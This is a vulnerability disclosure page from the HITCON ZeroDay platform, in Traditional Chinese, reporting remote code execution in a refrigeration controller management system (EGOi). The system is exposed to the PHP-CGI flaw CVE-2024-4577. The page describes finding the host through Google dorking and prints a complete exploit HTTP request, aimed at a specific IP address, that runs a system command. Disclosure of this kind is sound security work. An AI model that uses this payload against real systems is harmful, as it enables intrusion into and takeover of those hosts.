皇愷有限公司冷凍控制器管理系統- EGOi RCE

Vulnerability Overview

ZDID: ZD-2024-00887
發信 Vendor: 皇愷有限公司
Title: 皇愷有限公司冷凍控制器管理系統- EGOi RCE
Introduction: EGOi Plus 系統具 CVE-2024-4577 PHP CGI 漏洞，可執行 PHP 指令取得 nt authority\system 使用者執行權限

處理狀態

目前狀態

公開

Last Update : 2024/10/07

新提交
已審核
已通報
未回報修補狀況
未複測
公開

處理歷程

2024/08/07 02:48:53 : 新提交 (由 ywc 更新此狀態)
2024/08/08 09:44:07 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/13 11:44:10 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/13 11:44:10 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/08/13 11:44:10 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2024/10/07 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2024-00887
通報者：ywc (ywc)
風險：嚴重
類型：遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明： OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明： OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明： CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明： CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

透過 Google Dorking 找到冷凍控制器管理系統 (EGOi)

透過檢視頁面來源功能查看前端原始碼，可看到 /common/setSession 路徑

訪問路徑，發現會出現 debug 頁面，且可觀察到系統使用 xampp 且 php 版本為 8.2.4，具有 CVE-2024-4577 漏洞

使用以下 HTTP request，可成功執行 PHP 指令，並成功執行 whoami 指令並取得目前使用者資訊，顯示具有遠端執行系統指令能力

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 110.25.89.192
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Length: 25

<?php system("whoami");?>